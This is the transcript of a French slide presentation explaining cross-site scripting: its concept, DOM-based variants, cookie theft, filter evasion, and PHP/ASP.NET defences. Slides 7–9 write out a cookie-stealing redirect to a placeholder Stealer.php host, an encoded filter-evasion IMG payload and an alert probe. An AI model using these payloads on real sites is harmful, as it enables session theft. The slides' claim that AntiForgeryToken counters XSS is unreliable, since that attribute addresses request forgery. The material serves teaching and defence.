La présentation est en train de télécharger. S'il vous plaît, attendez

La présentation est en train de télécharger. S'il vous plaît, attendez

(fait son épicerie les jeudi). Cross site Scripting est l'attaque web la plus commune.

Publié parBrian Ménard Modifié depuis plus de 7 années

Présentations similaires

Présentation au sujet: "(fait son épicerie les jeudi). Cross site Scripting est l'attaque web la plus commune."— Transcription de la présentation:

1 (fait son épicerie les jeudi)

2 Cross site Scripting est l'attaque web la plus commune.

3 Le concept de XSS est de manipuler les scripts cotes client de l'application web pour exécuter les désirs d'un utilisateur malicieux. Une manipulation peut être par exemple exécuter a chaque fois que la page web est loader. XSS est la plus commune vulnérabilité WEB de nos jours. Pourtant il n'est pas toujours facile à trouver et à régler. Ces vulnérabilités peuvent apportés de graves conséquences comme le vol de données sensibles.

4

5 -XSS est une attaque web faites sur des applications web vulnérables -Dans une attaque XSS, la victime est l'utilisateur et non l'application -Dans une attaque XSS, le contenu malicieux est "livrer: aux utilisateurs qui utilisent JavaScript (pratiquement tout le monde) Si JS est désactiver, l'utilisation de plusieurs sites est impossible: exemple ACCESD

6 Le DOM-based ou local cross scripting site est un problème directement sur le script côté client (en général, le JavaScript) de la page (variables passées en URL qui sont réutilisées dans le JavaScript, etc..) Par les forums, formulaires d’inscription: Cette faille peut permettre des exécutions côté client ou côté serveur selon les cas et peut permettre tout type d'exploitation, de la récupération de cookies à l'éxécution de scripts malveillants.

7 Le vol de cookie: location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cooki e;

8 http://ha.ckers.org/xsscalc.html https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_ Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_ Sheet Encoder: <IMG SRC=javascr&#1 05;pt:aler&#1 16;( 'XSS')>

9 Dans un forum, une section commentaire, un formulaire d’inscrisption, bref tous les endroits où un utilisateur peut inscrire du texte. alert('xss')

10 Toujours valider les entrés de l’utilisateur, ne jamais lui faire confiance. Des méthodes comme htmlspecialchars(), strip_tags() en php peuvent être utilisées. Utiliser un attribut [AntiForgeryToken] en asp.net mvc au dessus des méthodes post des controllers

11 Ne faite jamais confiance à l’utilisateur pour bien protéger votre site!

12 http://ha.ckers.org/xsscalc.html https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_ Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_ Sheet http://www.breakthesecurity.com/2012/01/how-to-do-cookie- stealing-with-cross.html http://www.breakthesecurity.com/2012/01/how-to-do-cookie- stealing-with-cross.html http://www.bases-hacking.org/faille-xss.html

Télécharger ppt "(fait son épicerie les jeudi). Cross site Scripting est l'attaque web la plus commune."

Présentations similaires

Conception de Site Webs dynamiques Cours 6

Conception de Site Webs dynamiques Cours 6
Conception de Site Webs dynamiques Cours 5

Conception de Site Webs dynamiques Cours 5
Algorithmes et structures de données avancées Partie Conception de Sites Web dynamiques Cours 9 Patrick Reuter.

Algorithmes et structures de données avancées Partie Conception de Sites Web dynamiques Cours 9 Patrick Reuter.
Conception de Site Webs Interactifs Cours 4

Conception de Site Webs Interactifs Cours 4
Algorithmes et structures de données avancées Partie Conception de Sites Web dynamiques Cours 8 Patrick Reuter.

Algorithmes et structures de données avancées Partie Conception de Sites Web dynamiques Cours 8 Patrick Reuter.
Audit technique et analyse de code

Audit technique et analyse de code
Xavier Tannier Yann Jacob Sécurite Web.

Xavier Tannier Yann Jacob Sécurite Web.
Un peu de sécurité Modal Web Modal Baptiste DESPREZ

Un peu de sécurité Modal Web Modal Baptiste DESPREZ
Sécurité Informatique

Sécurité Informatique
Cours n°3 Les formulaires

Cours n°3 Les formulaires
2006/2007Denis Cabasson – Programmation Web Cours de programmation web ENSAE 2006-2007.

2006/2007Denis Cabasson – Programmation Web Cours de programmation web ENSAE
MODEX WEB BAPTISTE DESPREZ Un peu de sécurité. Avant dentrer dans le vif du sujet JavaScript Langage de script (comme PHP) Exécuté par votre navigateur.

MODEX WEB BAPTISTE DESPREZ Un peu de sécurité. Avant dentrer dans le vif du sujet JavaScript Langage de script (comme PHP) Exécuté par votre navigateur.
Les Redirections et renvois non validés

Les Redirections et renvois non validés
Développement dapplications web Initiation à la sécurité 1.

Développement dapplications web Initiation à la sécurité 1.
Nouveau blog. WordPress connexion Nommez votre blog.

Nouveau blog. WordPress connexion Nommez votre blog.
Comprendre l’environnement Web

Comprendre l’environnement Web
Les instructions PHP pour l'accès à une base de données MySql

Les instructions PHP pour l'accès à une base de données MySql
Xavier Tannier Sécurite Web.

Xavier Tannier Sécurite Web.
ASP.NET Par: Hugo St-Louis. C ARACTÉRISTIQUES A SP. NET Évolution, successeur plus flexible quASP (Active Server Pages). Pages web dynamiques permettant.

ASP.NET Par: Hugo St-Louis. C ARACTÉRISTIQUES A SP. NET Évolution, successeur plus flexible quASP (Active Server Pages). Pages web dynamiques permettant.
Jeudi, 20 août 2009 Sécurité informatique Cégep de St-Hyacinthe Par Hugo St-Louis.

Jeudi, 20 août 2009 Sécurité informatique Cégep de St-Hyacinthe Par Hugo St-Louis.

Présentations similaires

Annonces Google